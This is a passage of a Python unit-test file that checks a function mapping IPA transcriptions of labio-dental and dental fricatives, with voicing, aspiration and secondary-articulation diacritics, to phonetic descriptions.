def test_v̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labio-dental fricative pulmonic egressive consonant
def test_fʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʲ")
self.assertEqual(actual, expected)
def test_f̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ʲ")
self.assertEqual(actual, expected)
def test_f̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ʲ")
self.assertEqual(actual, expected)
def test_v̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʲ")
self.assertEqual(actual, expected)
def test_v̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labio-dental fricative pulmonic egressive consonant
def test_fˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fˠ")
self.assertEqual(actual, expected)
def test_f̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ˠ")
self.assertEqual(actual, expected)
def test_f̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ˠ")
self.assertEqual(actual, expected)
def test_v̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ˠ")
self.assertEqual(actual, expected)
def test_v̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labio-dental fricative pulmonic egressive consonant
def test_fˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fˤ")
self.assertEqual(actual, expected)
def test_f̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ˤ")
self.assertEqual(actual, expected)
def test_f̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ˤ")
self.assertEqual(actual, expected)
def test_v̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ˤ")
self.assertEqual(actual, expected)
def test_v̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labio-dental fricative pulmonic egressive consonant
def test_fʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰ")
self.assertEqual(actual, expected)
def test_v̥ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰ")
self.assertEqual(actual, expected)
def test_v̊ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant
def test_fʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰʷ")
self.assertEqual(actual, expected)
def test_v̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰʷ")
self.assertEqual(actual, expected)
def test_v̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant
def test_fʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰʲ")
self.assertEqual(actual, expected)
def test_v̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰʲ")
self.assertEqual(actual, expected)
def test_v̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant
def test_fʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰˠ")
self.assertEqual(actual, expected)
def test_v̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰˠ")
self.assertEqual(actual, expected)
def test_v̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant
def test_fʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰˤ")
self.assertEqual(actual, expected)
def test_v̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰˤ")
self.assertEqual(actual, expected)
def test_v̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰˤ")
self.assertEqual(actual, expected)
# voiced labio-dental fricative pulmonic egressive consonant
def test_v_is_the_representation_of_the_voiced_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v")
self.assertEqual(actual, expected)
def test_f̬_is_the_representation_of_the_voiced_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬")
self.assertEqual(actual, expected)
def test_f̬_is_the_representation_of_the_voiced_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬")
self.assertEqual(actual, expected)
# voiced labialized labio-dental fricative pulmonic egressive consonant
def test_vʷ_is_the_representation_of_the_voiced_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʷ")
self.assertEqual(actual, expected)
def test_f̬ʷ_is_the_representation_of_the_voiced_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʷ")
self.assertEqual(actual, expected)
def test_f̬ʷ_is_the_representation_of_the_voiced_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized labio-dental fricative pulmonic egressive consonant
def test_vʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʲ")
self.assertEqual(actual, expected)
def test_f̬ʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʲ")
self.assertEqual(actual, expected)
def test_f̬ʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized labio-dental fricative pulmonic egressive consonant
def test_vˠ_is_the_representation_of_the_voiced_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vˠ")
self.assertEqual(actual, expected)
def test_f̬ˠ_is_the_representation_of_the_voiced_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ˠ")
self.assertEqual(actual, expected)
def test_f̬ˠ_is_the_representation_of_the_voiced_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labio-dental fricative pulmonic egressive consonant
def test_vˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vˤ")
self.assertEqual(actual, expected)
def test_f̬ˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ˤ")
self.assertEqual(actual, expected)
def test_f̬ˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated labio-dental fricative pulmonic egressive consonant
def test_vʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰ")
self.assertEqual(actual, expected)
def test_v̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰ")
self.assertEqual(actual, expected)
def test_f̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labio-dental fricative pulmonic egressive consonant
def test_vʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰʷ")
self.assertEqual(actual, expected)
def test_v̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰʷ")
self.assertEqual(actual, expected)
def test_f̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant
def test_vʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰʲ")
self.assertEqual(actual, expected)
def test_v̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰʲ")
self.assertEqual(actual, expected)
def test_f̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labio-dental fricative pulmonic egressive consonant
def test_vʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰˠ")
self.assertEqual(actual, expected)
def test_v̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰˠ")
self.assertEqual(actual, expected)
def test_f̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant
def test_vʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰˤ")
self.assertEqual(actual, expected)
def test_v̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰˤ")
self.assertEqual(actual, expected)
def test_f̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless dental fricative pulmonic egressive consonant
def test_θ_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ")
self.assertEqual(actual, expected)
def test_θ̊_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊")
self.assertEqual(actual, expected)
def test_θ̥_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥")
self.assertEqual(actual, expected)
def test_ð̊_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊")
self.assertEqual(actual, expected)
def test_ð̥_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥")
self.assertEqual(actual, expected)
# voiceless labialized dental fricative pulmonic egressive consonant
def test_θʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʷ")
self.assertEqual(actual, expected)
def test_θ̊ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ʷ")
self.assertEqual(actual, expected)
def test_θ̥ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ʷ")
self.assertEqual(actual, expected)
def test_ð̊ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʷ")
self.assertEqual(actual, expected)
def test_ð̥ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized dental fricative pulmonic egressive consonant
def test_θʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʲ")
self.assertEqual(actual, expected)
def test_θ̊ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ʲ")
self.assertEqual(actual, expected)
def test_θ̥ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ʲ")
self.assertEqual(actual, expected)
def test_ð̊ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʲ")
self.assertEqual(actual, expected)
def test_ð̥ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized dental fricative pulmonic egressive consonant
def test_θˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θˠ")
self.assertEqual(actual, expected)
def test_θ̊ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ˠ")
self.assertEqual(actual, expected)
def test_θ̥ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ˠ")
self.assertEqual(actual, expected)
def test_ð̊ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ˠ")
self.assertEqual(actual, expected)
def test_ð̥ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized dental fricative pulmonic egressive consonant
def test_θˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θˤ")
self.assertEqual(actual, expected)
def test_θ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ˤ")
self.assertEqual(actual, expected)
def test_θ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ˤ")
self.assertEqual(actual, expected)
def test_ð̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ˤ")
self.assertEqual(actual, expected)
def test_ð̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated dental fricative pulmonic egressive consonant
def test_θʰ_is_the_representation_of_the_voiceless_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰ")
self.assertEqual(actual, expected)
def test_ð̥ʰ_is_the_representation_of_the_voiceless_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰ")
self.assertEqual(actual, expected)
def test_ð̊ʰ_is_the_representation_of_the_voiceless_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized dental fricative pulmonic egressive consonant
def test_θʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰʷ")
self.assertEqual(actual, expected)
def test_ð̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰʷ")
self.assertEqual(actual, expected)
def test_ð̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized dental fricative pulmonic egressive consonant
def test_θʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰʲ")
self.assertEqual(actual, expected)
def test_ð̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰʲ")
self.assertEqual(actual, expected)
def test_ð̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized dental fricative pulmonic egressive consonant
def test_θʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰˠ")
self.assertEqual(actual, expected)
def test_ð̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰˠ")
self.assertEqual(actual, expected)
def test_ð̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant
def test_θʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰˤ")
self.assertEqual(actual, expected)
def test_ð̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰˤ")
self.assertEqual(actual, expected)
def test_ð̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰˤ")
self.assertEqual(actual, expected)
# voiced dental fricative pulmonic egressive consonant
def test_ð_is_the_representation_of_the_voiced_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð")
self.assertEqual(actual, expected)
def test_θ̬_is_the_representation_of_the_voiced_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬")
self.assertEqual(actual, expected)
def test_θ̬_is_the_representation_of_the_voiced_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬")
self.assertEqual(actual, expected)
# voiced labialized dental fricative pulmonic egressive consonant
def test_ðʷ_is_the_representation_of_the_voiced_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʷ")
self.assertEqual(actual, expected)
def test_θ̬ʷ_is_the_representation_of_the_voiced_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʷ")
self.assertEqual(actual, expected)
def test_θ̬ʷ_is_the_representation_of_the_voiced_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized dental fricative pulmonic egressive consonant
def test_ðʲ_is_the_representation_of_the_voiced_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʲ")
self.assertEqual(actual, expected)
def test_θ̬ʲ_is_the_representation_of_the_voiced_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʲ")
self.assertEqual(actual, expected)
def test_θ̬ʲ_is_the_representation_of_the_voiced_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized dental fricative pulmonic egressive consonant
def test_ðˠ_is_the_representation_of_the_voiced_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðˠ")
self.assertEqual(actual, expected)
def test_θ̬ˠ_is_the_representation_of_the_voiced_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ˠ")
self.assertEqual(actual, expected)
def test_θ̬ˠ_is_the_representation_of_the_voiced_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized dental fricative pulmonic egressive consonant
